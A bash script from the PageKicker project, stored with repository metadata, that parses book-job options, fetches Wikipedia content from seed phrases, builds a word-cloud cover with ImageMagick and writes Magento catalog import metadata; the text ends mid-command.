"alpha_fraction": 0.6722955107688904, "alphanum_fraction": 0.6869760751724243, "avg_line_length": 23.11121940612793, "blob_id": "c451005d20489ebb433d9070030ad6cc47524ad7", "content_id": "e90e6d014701c9ae23dbcfed374cea4cbd8f18f4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 24931, "license_type": "permissive", "max_line_length": 843, "num_lines": 1034, "path": "/scripts/bin/create-catalog-entry.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\"\n\nTEXTDOMAIN=SFB # required for bash language awareness\necho $\"hello, world, I am speaking\" $LANG\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\necho \"software version number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'`\n#echo $PATH\n# echo \"I am\" $(whoami)\nstarttime=$(( `date +%s` ))\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku\" $sku\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--xmlfilename)\nxmlfilename=$2\nshift 2\n;;\n--xmlfilename=*)\nxmlfilename=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--seedfile)\nseedfile=$2\nshift 2\n;;\n--seedfile=*)\nseedfile=${1#*=}\nshift\n;;\n--seedsviacli)\nseedsviacli=$2\nshift 2\n;;\n--seedsviacli=*)\nseedsviacli=${1#*=}\nshift\n;;\n--pdfdir)\npdfdir=$2\nshift 2\n;;\n--pdfdir*)\npdfdir=${1#*=}\nshift\n;;\n--pdf_infile)\npdf_infile=$2\nshift 2\n;;\n--pdf_infile*)\npdf_infile=${1#*=}\nshift\n;;\n--txt_infile)\ntxt_infile=$2\nshift 2\n;;\n--txt_infile*)\ntxt_infile=${1#*=}\nshift\n;;\n--url_infile)\nurl_infile=$2\nshift 2\n;;\n--url_infile*)\nurl_infile=${1#*=}\nshift\n;;\n--csv_infile)\ncsv_infile=$2\nshift 2\n;;\n--csv_infile=*)\ncsv_infile=${1#*=}\nshift\n;;\n--booktype)\nbooktype=$2\nshift 2\n;;\n--booktype=*)\nbooktype=${1#*=}\nshift\n;;\n--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n--singleseed)\nsingleseed=$2\nshift 2\n;;\n--singleseed=*)\nsingleseed=${1#*=}\nshift\n;;\n--truncate_seed)\ntruncate_seed=$2\nshift 2\n;;\n--truncate_seed=*)\ntruncate_seed=${1#*=}\nshift\n;;\n--builder)\nbuilder=$2\nshift 2\n;;\n--builder=*)\nbuilder=${1#*=}\nshift\n;;\n--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n--mailtoadmin)\nmailtoadmin=$2\nshift 2\n;;\n--mailtoadmin=*)\nmailtoadmin=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--websites)\nwebsites=$2\nshift 2\n;;\n--websites=*)\nwebsites=${1#*=}\nshift\n;;\n--attribute_set)\nattribute_set=$2\nshift 2\n;;\n--attribute_set=*)\nattribute_set=${1#*=}\nshift\n;;\n--type)\ntype=$2\nshift 2\n;;\n--type=*)\ntype=${1#*=}\nshift\n;;\n--categories)\ncategories=$2\nshift 2\n;;\n--categories=*)\ncategories=${1#*=}\nshift\n;;\n--customerid)\ncustomerid=$2\nshift 2\n;;\n--customerid=*)\ncustomerid=${1#*=}\nshift\n;;\n--status)\nstatus=$2\nshift 2\n;;\n--status=*)\nstatus=${1#*=}\nshift\n;;\n--visibility)\nvisibility=$2\nshift 2\n;;\n--visibility=*)\nvisibility=${1#*=}\nshift\n;;\n--featured)\nfeatured=$2\nshift 2\n;;\n--featured=*)\nfeatured=${1#*=}\nshift\n;;\n--special_to_buffer)\nspecial_to_buffer=$2\nshift 2\n;;\n--special_to_buffer=*)\nspecial_to_buffer=${1#*=}\nshift\n;;\n--storeids)\nstoreids=$2\nshift 2\n;;\n--storeids=*)\nstoreids=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n--exemplar_file)\nexemplar_file=$2\nshift 2\n;;\n--exemplar_file=*)\nexemplar_file=${1#*=}\nshift\n;;\n--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--wikilang)\nwikilang=$2\nshift 2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n--revenue_share)\nrevenue_share=$2\nshift 2\n;;\n--revenue_share=*)\nrevenue_share=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n--format)\nformat=$2\nshift 2\n;;\n--format=*)\nformat=${1#*=}\nshift\n;;\n--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n--book_description)\nbook_description=$2\nshift 2\n;;\n--book_description=*)\nbook_description=${1#*=}\nshift\n;;\n--seedphrases)\nseedphrases=$2\nshift 2\n;;\n--seedphrases=*)\nseedphrases=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n--subtitle)\nsubtitle=$2\nshift 2\n;;\n--subtitle=*)\nsubtitle=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corpora=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n--dontcleanupseeds)\ndontcleanupseeds=$2\nshift 2\n;;\n--dontcleanupseeds=*)\ndontcleanupseeds=${1#*=}\nshift\n;;\n--top_q)\ntop_q=$2\nshift 2\n;;\n--top_q=*)\ntop_q=${1#*=}\nshift\n;;\n--summary)\nsummary=$2\nshift 2\n;;\n--summary=*)\nsummary=${1#*=}\nshift\n;;\n--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n--pricing)\npricing=$2\nshift 2\n;;\n--pricing=*)\npricing=${1#*=}\nshift\n;;\n--add_this_content)\nadd_this_content=$2\nshift 2\n;;\n--add_this_content=*)\nadd_this_content=${1#*=}\nshift\n;;\n--add_this_content_part_name)\nadd_this_content_part_name=$2\nshift 2\n;;\n--add_this_content_part_name=*)\nadd_this_content_part_name=${1#*=}\nshift\n;;\n--add_dat_run)\nadd_dat_run=$2\nshift 2\n;;\n--add_dat_run=*)\nadd_dat_run=${1#*=}\nshift\n;;\n--expand_seeds_to_pages)\nexpand_seeds_to_pages=$2\nshift 2\n;;\n--expand_seeds_to_pages=*)\nexpand_seeds_to_pages=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper=${1#*=}\nshift\n;;\n--twitter_announcement)\ntwitter_announcement=$2\nshift 2\n;;\n--twitter_announcement=*)\ntwitter_announcement=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\necho \"PYTHON_BIN is $PYTHON_BIN\"\n\"$PYTHON_BIN\" --version\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 \"$TMPDIR\"\nmkdir -p -m 777 \"$TMPDIR\"$uuid\nmkdir -p -m 777 \"$TMPDIR\"$uuid/wiki\nmkdir -p -m 777 \"$TMPDIR\"$uuid/user\nmkdir -p -m 777 \"$TMPDIR\"$uuid/flickr\nmkdir -p -m 777 \"$TMPDIR\"$uuid/fetch\nmkdir -p -m 777 \"$TMPDIR\"$uuid/seeds\nmkdir -p -m 777 \"$TMPDIR\"$uuid/images\nmkdir -p -m 777 \"$TMPDIR\"$uuid/mail\nmkdir -p -m 755 \"$TMPDIR\"$uuid/cover\nmkdir -p -m 755 \"$TMPDIR\"$uuid/twitter\nmkdir -p -m 755 $mediatargetpath$uuid\nmkdir -p -m 755 $metadatatargetpath$uuid\n\ncase \"$format\" in\nxml)\n\techo \"getting metadata from xml file\"\n\n\txmlbasepath=\"$WEBFORMSXML_HOME\"\n\n\techo \"xmlbasepath is\" $xmlbasepath\n\techo \"xmlfilename is\" $xmlfilename\n\txmlfilename=$xmlbasepath/$xmlfilename\n\n\tbooktitle=$(xmlstarlet sel -t -v \"/item/booktitle\" \"$xmlfilename\")\n\tbooktype=$(xmlstarlet sel -t -v \"/item/booktype\" \"$xmlfilename\")\n\tBISAC_code=$(xmlstarlet sel -t -v \"/item/BISAC_code\" \"$xmlfilename\")\n\tcustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\tenvironment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\n\texemplar_file=$(xmlstarlet sel -t -v \"/item/exemplar_file\" \"$xmlfilename\")\n\tjobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\n\twikilang=$(xmlstarlet sel -t -v \"/item/wikilang\" \"$xmlfilename\")\n\trevenue_share=$(xmlstarlet sel -t -v \"/item/revenue_share\" \"$xmlfilename\")\n\tsources=$(xmlstarlet sel -t -v \"/item/sources\" \"$xmlfilename\")\n\tsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\n\ttldr=$(xmlstarlet sel -t -v \"/item/tldr\" \"$xmlfilename\")\n\tseedphrases=$(xmlstarlet sel -t -v \"/item/seed-phrases\" \"$xmlfilename\")\n\tbook_description=$(xmlstarlet sel -t -v \"/item/book-description\" \"$xmlfilename\")\n\tcoverfont=$(xmlstarlet sel -t -v \"/item/coverfont\" \"$xmlfilename\")\n\tcovercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n\tyourname=$(xmlstarlet sel -t -v \"/item/yourname\" \"$xmlfilename\")\n\tcustomername=$(xmlstarlet sel -t -v \"/item/customername\" \"$xmlfilename\")\n\tcustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\n\tadd_this_content=$(xmlstarlet sel -t -v \"/item/add_this_content\" \"$xmlfilename\")\n\techo \"environment is\" $environment | tee --append $xform_log\n\techo \"jobprofilename is\" $jobprofilename | tee --append $xform_log\n\techo \"exemplar_file is\" $exemplar_file | tee --append $xform_log\n\n\techo -n \"$seedphrases\" > \"$TMPDIR\"$uuid/seeds/seedphrases\n\n\tcp $WEBFORMSHOME$submissionid/$exemplar_filedir_code/*/$exemplar_file \"$TMPDIR\"$uuid/$exemplar_file\n;;\ncsv)\n\techo \"getting metadata from csv\"\n\tcp $seedfile \"$TMPDIR\"$uuid/seeds/seedphrases\n;;\n*)\n\techo \"getting path to seedfile from command line\"\n\tif [ -z \"$seedfile\" ] ; then\n\t\techo \"no seedfile provided\"\n\t\t\tif [ -z \"$singleseed\" ] ; then\n\t\t\t\techo \"no singleseed provided\"\n\t\t\t\t\tif [ -z \"$seedsviacli\" ] ; then\n\t\t\t\t\t\techo \"no seedsviacli provided, exiting\"\n\t\t\t\t\telse\n\t\t\t\t\t\techo \"$seedsviacli\" | sed -e 's/;/\\n/' > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\t\t\tfi\n\t\t\telse\n\t\t\t\tseed=\"$singleseed\"\n\t\t\t\techo \"$singleseed\" > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\tfi\n\telse\n\t echo \"path to seedfile was $seedfile\"\n\t\tcp $seedfile \"$TMPDIR\"$uuid/seeds/seedphrases\n\tfi\n;;\nesac\n\n\n# assign wikilocale & stopfile based on LANG\n\n# deprecated assigning wikilocale via environment $LANG\n\n# wikilocale=$(grep $LANG locale/wiki-lookup.csv | cut -d, -f2)\n\n# kluge for backwards compatibility\nif [ \"$wikilang\" = \"en_US.UTF-8\" ] ; then\n\twikilang=\"en\"\nelse\n\techo \"wikilang in wikipedia domain format\"\nfi\n\nwikilocale=$wikilang\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\necho \"wikilocale now is \"$wikilang\n\nif [ -z \"$imprint\" ]; then\n\timprint=\"default\"\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$fimpr\".imprint\"\nelse\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\n echo \"imprint is $imprint\"\nfi\n\nif [ -z \"$jobprofilename\" ]; then\n\tjobprofilename=\"default\"\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nelse\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nfi\n\nhuman_author=\"$editedby\"\n\n# APIs\n\n. includes/api-manager.sh\n\n# echo $scriptpath \"is scriptpath\"\n\necho \"Assembling infiles and assets\"\n\necho -n \"$book_description\" > \"$TMPDIR\"$uuid/book-description.txt\necho -n \"$tldr\" > \"$TMPDIR\"$uuid/tldr.txt\necho \"analyze_url is $analyze_url\"\nif [ -z ${analyze_url+x} ] ; then\n\techo \"$analyze_url not set as analyze_url\"\nelse\n\tif [[ $analyze_url =~ $httpvalidate ]] ; then\n\t\techo \"$analyze_url is valid URI\"\n\t\techo \"analyze_url is set as $analyze_url\"\n\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/webpage.md\"\n\t\t\"$PYTHON27_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/webpage.md\" \"$TMPDIR\"$uuid\"/webseeds\" \"$uuid\"\n\t\techo \"seeds extracted from analyze_url\"\n\t\t head -n \"$top_q\" \"$TMPDIR\"$uuid\"/webseeds\" | sed '/^\\s*$/d' > \"$TMPDIR\"$uuid\"/webseeds.top_q\"\n\t\tcat \"$TMPDIR\"$uuid\"/webseeds.top_q\" > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/webseeds\") <(sort \"locale/stopwords/webstopwords.en\") >> \"$TMPDIR\"$uuid/seeds/seedphrases\n\telse\n\t\techo \"invalid URI, analyze_url not added\"\n\tfi\nfi\n\n# echo \"checking for naughty words\"\n\nexport uuid\n\"$scriptpath\"bin/screen-naughty-seeds.sh \"$TMPDIR$uuid/seeds/seedphrases\" $uuid\nnaughtyresult=$?\n\nif [ $naughtyresult -eq \"0\" ] ; then\n\techo \"naughty seeds checked\"\nelse\n\techo \"Exited with problem in screen-naughty-seeds.sh\"\n \texit 0\nfi\n\n# echo \"checking for human error on form submission\"\n\n#if bin/screen-human-error.sh \"$TMPDIR\"$uuid/seeds/seedphrases ; then\n# echo \"Exited with zero value\"\n#else\n# echo \"Exited with non zero\"\n# exit 0\n#fi\n\necho \"seedfile is\" $seedfile\n\n# screen for zero value seed file\n\n\ncat \"$TMPDIR$uuid/seeds/seedphrases\" | uniq | sort | sed -e '/^$/d' -e '/^[0-9#@]/d' > \"$TMPDIR$uuid/seeds/sorted.seedfile\"\ncat \"$TMPDIR$uuid/seeds/sorted.seedfile\" > \"$LOCAL_DATA\"seeds/history/\"$sku\".seedphrases\n\n#expand seeds to valid wiki pages\n\nif [ \"$expand_seeds_to_pages\" = \"yes\" ] ; then\n\t\techo \"$expand_seeds_to_pages\"\n\t\t\"$PYTHON27_BIN\" bin/wiki_seeds_2_pages.py --infile \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" --pagehits \"$TMPDIR\"$uuid\"/seeds/pagehits\"\nelse\n\t\techo \"not expanding seeds to pages\"\n\t\tcp \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" \"$TMPDIR\"$uuid\"/seeds/pagehits\"\nfi\n\n# filter pagehits\n\n\ncp \"$TMPDIR\"$uuid/seeds/pagehits \"$TMPDIR\"$uuid/seeds/filtered.pagehits\n\necho \"--- filtered pagehits are ---\"\ncat \"$TMPDIR\"$uuid/seeds/filtered.pagehits\n\necho \"--- end of pagehits ---\"\n\n# fetch data I will need based on seedfile\n\necho \"summary is\" $summary #summary should be on for cover building\nwikilocale=\"en\" # hard code for testing\necho $wikilocale \"is wikilocale\"\n\n# fetch by pagehits\n\ncase $summary in\n\tsummaries_only)\n\t\techo \"fetching page summaries only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikisummaries.md\" --lang \"$wikilocale\" --summary 1> /dev/null\n\t\twordcountsummaries=$(wc -w \"$TMPDIR$uuid/wiki/wikisummaries.md\" | cut -f1 -d' ')\n\t\techo \"wordcountsummaries is\" $wordcountsummaries\n\t\tcp \"$TMPDIR$uuid\"/wiki/wikisummaries.md \"$TMPDIR$uuid\"/wiki/wiki4cloud.md\n\t\t;;\n\tcomplete_pages_only)\n\t\techo \"fetching complete pages only\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikipages.md\" --lang \"$wikilocale\" 1> /dev/null\n\t\twordcountpages=$(wc -w \"$TMPDIR$uuid/wiki/wikipages.md\" | cut -f1 -d' ')\n\t\techo \"wordcountpages is\" $wordcountpages\n\t\tcp \"$TMPDIR$uuid\"/wiki/wikipages.md \"$TMPDIR$uuid\"/wiki/wiki4cloud.md\n\t\t;;\n\tboth)\n\t\techo \"fetching both summaries and complete pages\"\n\t\techo \"fetching page summaries now\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikisummaries.md\" --lang \"$wikilocale\" --summary 1> /dev/null\n\t\twordcountsummaries=$(wc -w \"$TMPDIR$uuid\"/wiki/wikisummaries.md | cut -f1 -d' ')\n\t\techo \"fetching complete pages now\"\n\t\t\"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"$TMPDIR$uuid/wiki/wikipages.md\" --lang \"$wikilocale\" 1> /dev/null\n\t\twordcountpages=$(wc -w \"$TMPDIR$uuid\"/wiki/wikipages.md | cut -f1 -d' ')\n\t\tif [ \"$wordcountpages\" -gt \"100000\" ] ; then\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\techo \"body too big for wordcloud, using abstracts only\"\n\t\telse\n\t\t\tcat \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wikipages.md > \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\techo \"building wordcloud from body + summaries\"\n\t\tfi\n\t\t;;\n\t*)\n\t\techo \"unrecognized summary option\"\n\t;;\nesac\n\nwordcount=$(($wordcountsummaries + $wordcountpages))\necho \"wordcount is $wordcount\"\n\nif [ \"$wordcountsummaries\" -gt \"0\" ] ; then\n\n\techo \"summaries data has been returned, proceeding\"\n\nelif [ \"$wordcountpages\" -gt \"0\" ] ; then\n\n\techo \"pages data has been returned, proceeding\"\n\nelse\n\n\techo \"zero data returned from wiki, exiting with error message\"\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"Your submission [ $booktitle ] has not been added to the catalog\" \\\n\t\t-m \"The system was not able to find any valid seed terms in your submission. Make sure that you have provided several keyphrases and that the words are spelled correctly. Please let us know by replying to this message if you need assistance.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-v \\\n\t\t-o tls=yes\n\texit 73\nfi\n\n# build cover\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\ncp $confdir\"jobprofiles\"/signatures/$sigfile \"$TMPDIR\"$uuid/$sigfile\n\n#select wordcloud stopfile\n\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"it\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/it\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n#rotate stopfile\n\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating stopfile into place\"\n\tcp \"$stopfile\" \"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n\t\"$JAVA_BIN\" -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w \"1800\" -h \"1800\" < \"$TMPDIR$uuid\"/wiki/wiki4cloud.md > \"$TMPDIR\"$uuid/cover/wordcloudcover.png\n\n#copying old stopfile backup to overwrite rotated stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating old stopfile back in place\"\n\tcp $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# set font & color\n\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\tcoverfont=`./bin/random-line.sh ../conf/fonts.txt`\n\techo \"random coverfont is \" $coverfont\n\nelse\n\tcoverfont=$coverfont\n\techo \"using specified cover font\" $coverfont\nfi\n\n\nif [ \"$covercolor\" = \"Random\" ]; then\n\tcovercolor=`./bin/random-line.sh ../conf/colors.txt`\n\techo \"random covercolor is \" $covercolor\nelse\n\tcovercolor=$covercolor\n\techo \"using specified covercolor \"$covercolor\n\nfi\n\n\n#create base canvases\n\nconvert -size 1800x2400 xc:$covercolor \"$TMPDIR\"$uuid/cover/canvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/topcanvas.png\nconvert -size 1800x400 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomcanvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/toplabel.png\nconvert -size 1800x200 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# underlay canvas\n\ncomposite -gravity Center \"$TMPDIR\"$uuid/cover/wordcloudcover.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/canvas.png\n\n# build top label\n\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size 1800x400 -font \"$coverfont\" caption:\"$booktitle\" \"$TMPDIR\"$uuid/cover/topcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/toplabel.png\n\n#build bottom label\n\necho \"yourname is\" $yourname\nif [ \"$yourname\" = \"yes\" ] ; then\n\teditedby=\"$human_author\"\nelse\n\techo \"robot name on cover\"\nfi\n\necho \"editedby is\" $editedby\n\n# editedby=\"PageKicker Robot \"$editedby\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity south -size 1800x394 \\\n -font \"$coverfont\" caption:\"$editedby\" \\\n \"$TMPDIR\"$uuid/cover/bottomcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# resize imprint logo\n\nconvert \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" -resize x200 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\n\n# lay the labels on top of the target canvas\n\ncomposite -geometry +0+0 \"$TMPDIR\"$uuid/cover/toplabel.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/step1.png\ncomposite -geometry +0+1800 \"$TMPDIR\"$uuid/cover/bottomlabel.png \"$TMPDIR\"$uuid/cover/step1.png \"$TMPDIR\"$uuid/cover/step2.png\ncomposite -gravity south -geometry +0+0 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/step2.png \"$TMPDIR\"$uuid/cover/cover.png\nconvert \"$TMPDIR\"$uuid/cover/cover.png -border 36 -bordercolor white \"$TMPDIR\"$uuid/cover/bordercover.png\ncp \"$TMPDIR\"$uuid/cover/bordercover.png \"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\"\nconvert \"$TMPDIR\"$uuid/cover/bordercover.png -resize 228x302 \"$TMPDIR\"$uuid/cover/$sku\"ebookcover_thumb.jpg\"\n\n\n# move cover to import directory\n\ncp \"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\" $mediatargetpath$uuid/$sku\"ebookcover.jpg\"\nls -l $mediatargetpath$uuid/$sku\"ebookcover.jpg\"\necho \"* * * building Magento metadata header * * *\"\necho \"metadatatargetpath is \"$metadatatargetpath\necho \"uuid is\" $uuid\necho \"verifying uuid directory\"\nls $metadatatargetpath$uuid\nls -la \"$TMPDIR\"$uuid/tldr.txt \"$TMPDIR\"$uuid/book-description.txt\n\ncat includes/builder-metadata-header.csv > $metadatatargetpath$uuid/\"current-import.csv\"\necho \"writing Magento metadata footer\" to $metadatatargetpath$uuid/\"current-import.csv\"\n. includes/builder-metadata-footer.sh >> $metadatatargetpath$uuid/\"current-import.csv\"\n\necho \"writing Dublin Core metadata for use by pandoc\"\n#. includes/dc-metadata.txt\n\n# increment SKU by 1\n\t\tprevsku=$sku\n\t\tsku=$((sku+1))\n\t\techo $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\n\t\techo \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\"\n\n#\nif [ \"$import\" = \"yes\" ] ; then\n\n\techo \"adding import job to the manifest\"\n\n\techo \"$uuid\" >> $scriptpath/import_status/manifest.csv\n ls -lart $scriptpath/import_status/manifest.csv\n\t$scriptpath\"bin/receiving_dock.sh\"\n\n\nelse\n\n\techo \"not importing this job\"\n\nfi\n\n\n##verbose logging for sendemail\n# cp \"$TMPDIR\"$uuid/seeds/seedphrases \"$TMPDIR\"$uuid/seeds/\"$sku\"seeds.txt\n\nif [ \"$builder\" = \"yes\" ] ; then\n\n\techo \"seedfile was\" \"$TMPDIR\"seeds/seedphrases\n\n\t$scriptpath\"bin/builder.sh\" --seedfile \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" --booktype \"$booktype\" --jobprofilename \"$jobprofilename\" --booktitle \"$booktitle\" --ebook_format \"epub\" --sample_tweets \"no\" --wikilang \"$wikilocale\" --coverfont \"$coverfont\" --covercolor \"$covercolor\" --passuuid \"$uuid\" --truncate_seed \"no\" --editedby \"$editedby\" --yourname \"$yourname\" --customername \"$customername\" --imprint \"$imprint\" --batch_uuid \"$batch_uuid\" --tldr \"$tldr\" --subtitle \"$subtitle\" \\\n\t --add_corpora \"$add_corpora\" --analyze_url \"$analyze_url\" --dontcleanupseeds \"yes\" 